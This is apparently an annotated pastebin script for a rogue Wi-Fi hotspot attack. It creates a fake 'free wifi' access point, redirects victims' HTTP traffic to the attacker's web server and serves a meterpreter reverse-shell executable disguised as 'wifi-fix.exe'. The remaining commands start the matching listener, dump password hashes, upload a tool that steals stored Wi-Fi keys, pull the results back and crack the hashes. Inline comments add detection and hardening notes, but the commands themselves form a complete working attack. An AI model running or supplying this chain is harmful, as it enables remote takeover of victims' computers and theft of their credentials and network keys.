
g0tmi1k

a guest
Jun 26th, 2009
  1. #Non Transparent - Target can't get on the internet
  2. #Fake AP: wlan1
  3. #Target's IP Address: 10.0.0.20
  4.  
  5. #**************************************************** Setup Fake AP ********
      # Loads the tun kernel module, then starts a software access point on wlan1
      # advertising the ESSID "free wifi". -P answers every probe request and
      # -C 30 re-beacons the probed ESSIDs, so a client that auto-joins remembered
      # open networks may associate without the user choosing this network.
      # Defensive note: one radio answering probes for arbitrary ESSIDs is a
      # rogue-AP indicator a wireless IDS can flag. On clients, turn off
      # auto-connect for open networks and delete stale saved profiles.
  6. modprobe tun
  7. airbase-ng -P -C 30 -e "free wifi" wlan1 -v
  8.  
  9. #******************************************* Non Transparent Airbase ********
      # Gives at0 the address 10.0.0.1/24 with MTU 1400 (at0 is presumably the
      # tap interface created by the access-point process - confirm).
      # The four flush/delete-chain commands wipe every existing filter and nat
      # rule on this host, so any firewall policy it had is gone afterwards.
      # The two PREROUTING DNAT rules rewrite ALL inbound UDP and all TCP/80 to
      # 10.0.0.1, whatever destination the client asked for. No MASQUERADE or
      # upstream route is added, which matches the "Non Transparent" header:
      # clients get no real internet access.
      # Defensive note: only UDP and plain HTTP are redirected here. HTTPS with
      # certificate validation (and HSTS) is not rewritten by these rules, and
      # every HTTP request landing on the gateway address is an anomaly that
      # client-side or network monitoring can detect.
  10. ifconfig at0 up
  11. ifconfig lo up
  12. ifconfig at0 10.0.0.1 netmask 255.255.255.0
  13. ifconfig at0 mtu 1400
  14. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  15. iptables --flush
  16. iptables --table nat --flush
  17. iptables --delete-chain
  18. iptables --table nat --delete-chain
  19. iptables -t nat -A PREROUTING -p udp -j DNAT --to 10.0.0.1
  20. iptables -P FORWARD ACCEPT
  21. iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
  22.  
  23. #************************************************ Setup DHCP Server ********
      # Runs the DHCP daemon in the foreground (-f) with logging to stderr (-d),
      # serving interface at0 from /etc/dhcpd.conf. That file is not shown, so
      # the lease range, gateway and DNS values handed out are unknown here.
      # Presumably it covers the 10.0.0.20 address named in the header - confirm.
      # Defensive note: the lease is the point where a client accepts this
      # host as its gateway; a lease from an unexpected server on an open
      # network deserves suspicion.
  24. dhcpd3 -d -f -cf /etc/dhcpd.conf at0
  25.  
  26. #************************************** Force them to go to our site ********
      # This rule is identical to the TCP/80 DNAT rule on listing line 21, so
      # it appends a second copy of the same entry to the nat PREROUTING chain.
      # The two commented-out lines would start a Java program from
      # /pentest/misc/dnspentest with 10.0.0.1 passed twice. Its behaviour is
      # not shown; presumably it is a DNS responder - confirm.
      # Defensive note: from the client side this looks like a captive portal.
      # Any page reached this way is controlled by the AP operator, so
      # download prompts from it should be treated as untrusted.
  27. iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
  28. # cd /pentest/misc/dnspentest
  29. # java ServerKernelMain 10.0.0.1 10.0.0.1
  30.  
  31. #************************************************** Start Web Server ********
      # Starts the web server through the "start-apache" helper. The helper is
      # not shown; presumably it is a distribution script serving /var/www - confirm.
      # Together with the TCP/80 redirect, this is the server that answers
      # every redirected HTTP request from associated clients.
  32. sh -c "start-apache"
  33.  
  34. #**************************************************** Get exploit ready ********
      # The commented-out lines are an interactive console variant of the same
      # listener, with LPORT set to 55555. The two active commands set no
      # LPORT, so they rely on the framework default rather than 55555.
      # Active lines: generate a Windows executable carrying a reverse-TCP
      # payload that calls back to 10.0.0.1, write it into the web root as
      # wifi-fix.exe, then start the matching listener.
      # Defensive note: nothing here exploits a software flaw. The chain
      # depends on the user downloading and running an unsigned executable
      # with a lure filename. Application allow-listing, endpoint AV/EDR,
      # and a "never run files offered by a hotspot page" policy break it.
      # An outbound TCP session from a client to its own default gateway,
      # started right after a download, is a useful detection signal.
  35. cd /pentest/exploits/framework3
  36. #./msfconsole
  37. #use exploit/multi/handler
  38. #set PAYLOAD windows/meterpreter/reverse_tcp
  39. #set LHOST 10.0.0.1
  40. #set LPORT 55555
  41. #show options
  42. #exploit
  43. ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 X > /var/www/wifi-fix.exe
  44. ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 E
  45.  
  46. #*************************************** Check that Target connected ********
      # Prints the ARP table for at0 in numeric, verbose form, then pings the
      # address given as the target in the header. ping has no count option
      # here, so it runs until interrupted.
  47. arp -n -v -i at0
  48. ping 10.0.0.20
  49.  
  50. #***************************************************** Metasploit fun ********
      # These lines are not shell commands. They are typed into the framework
      # console or an open session: list sessions, show host information and
      # the current user, load the "priv" extension, dump local account
      # password hashes, and attach to session 1.
      # Defensive note: dumping local hashes generally needs elevated rights on
      # the victim (presumably administrator or SYSTEM - confirm), so day-to-day
      # use of a non-admin account limits this step. Disabling LM hash storage,
      # and using long, unique local passwords, reduces what dumped hashes are worth.
  51. session -l
  52. sysinfo
  53. getuid
  54. use priv
  55. hashdump
  56. session -i 1
  57.  
  58. #***************************************************** Steal wifi info ********
      # Session commands, not shell. They create directories under C:\g0tmi1k
      # on the victim, upload wkv.exe and wkv32.exe from /root/tools/wkviewer,
      # run wkv.bat hidden (-H), then print wkv.txt and copy it back to
      # /root/wkv.txt. Going by the section title, the uploaded tool
      # presumably reads the wireless keys stored on the host - confirm.
      # Incident-response note: artifacts to look for are the C:\g0tmi1k
      # directory tree, the wkv*.exe binaries and wkv.txt. Any pre-shared
      # key stored on an affected machine should be treated as disclosed and
      # rotated. Per-user 802.1X credentials limit the damage compared with
      # a shared passphrase.
  59. mkdir c://g0tmi1k
  60. mkdir c://g0tmi1k//wkviewer
  61. cd C:/g0tmi1k/wkviewer4
  62. upload /root/tools/wkviewer/wkv.exe c://g0tmi1k//wkviewer4
  63. upload /root/tools/wkviewer/wkv32.exe c://g0tmi1k//wkviewer4
  64. #upload /root/tools/wkviewer/wkv64.exe c://g0tmi1k//wkviewer4
  65. #upload /root/tools/wkviewer/wkv.bat c://g0tmi1k//wkviewer4
  66. #upload /root/tools/wkviewer/metsvc-server.exe c://g0tmi1k//wkviewer4
  67. #upload /root/tools/wkviewer/metsrv.dll c://g0tmi1k//wkviewer4
  68. #upload /root/tools/wkviewer/metsvc.exe c://g0tmi1k//wkviewer4
  69. execute -H -f wkv.bat
  70. cat wkv.txt
  71. download wkv.txt /root/wkv.txt
  72.  
  73. #***************************************************** Crack Hashes ********
      # Leaves the session, runs an offline password cracker against
      # /root/HASH.txt, then deletes that file. Nothing shown in this listing
      # writes /root/HASH.txt; presumably the dumped hashes were saved
      # there by hand - confirm.
      # Defensive note: once hashes have left the host, cracking happens
      # offline and cannot be rate-limited or logged. The only controls are
      # password length and uniqueness, and the hash format stored on the endpoint.
  74. exit
  75. cd /pentest/passwords/jtr/
  76. ./john /root/HASH.txt
  77. rm -r /root/HASH.txt